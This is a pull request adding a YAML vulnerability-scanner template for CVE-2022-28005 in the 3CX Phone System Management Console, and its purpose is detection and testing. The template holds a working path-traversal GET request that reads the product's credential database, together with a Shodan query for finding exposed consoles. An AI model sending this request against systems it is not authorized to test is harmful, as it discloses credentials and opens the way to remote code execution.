### PR TITLE
Add CVE-2022-28005 (vKEV)

### DIFF
--- a/http/cves/2022/CVE-2022-28005.yaml
+++ b/http/cves/2022/CVE-2022-28005.yaml
@@ -1,0 +1,54 @@
+id: CVE-2022-28005
+
+info:
+  name: 3CX Phone System Management Console - Path Traversal and Unrestricted File Upload
+  author: daffainfo
+  severity: critical
+  description: |
+    An issue was discovered in the 3CX Phone System Management Console prior to version 18 Update 3 FINAL. An unauthenticated attacker could abuse improperly secured access to arbitrary files on the server (via /Electron/download directory traversal in conjunction with a path component that uses backslash characters), leading to cleartext credential disclosure. Afterwards, the authenticated attacker is able to upload a file that overwrites a 3CX service binary, leading to Remote Code Execution as NT AUTHORITY\SYSTEM on Windows installations. NOTE: this issue exists because of an incomplete fix for CVE-2022-48482.
+  impact: |
+    Attackers can disclose credentials and execute arbitrary code with SYSTEM privileges on Windows systems.
+  remediation: |
+    Update to version 18 Update 3 FINAL or later.
+  reference:
+    - https://medium.com/%40frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
+    - https://www.3cx.com/blog/releases/v18-update-3-final/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28005
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-28005
+    cwe-id: CWE-522
+    epss-score: 0.12464
+    epss-percentile: 0.93684
+    cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-requests: 1
+    vendor: 3cx
+    product: 3cx
+    shodan-query: http.title:"3CX Phone System Management Console" port:5001
+  tags: cve,cve2022,3cx,vkev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Electron/download/windows/\\Program%20Files\\3CX%20Phone%20System\\Data\\DB\\base\\16384\\16393"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'database_single'
+          - 'cfguser_default'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

An issue was discovered in the 3CX Phone System Management Console prior to version 18 Update 3 FINAL. An unauthenticated attacker could abuse improperly secured access to arbitrary files on the server (via /Electron/download directory traversal in conjunction with a path component that uses backslash characters), leading to cleartext credential disclosure. Afterwards, the authenticated attacker is able to upload a file that overwrites a 3CX service binary, leading to Remote Code Execution as NT AUTHORITY\SYSTEM on Windows installations. NOTE: this issue exists because of an incomplete fix for CVE-2022-48482.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)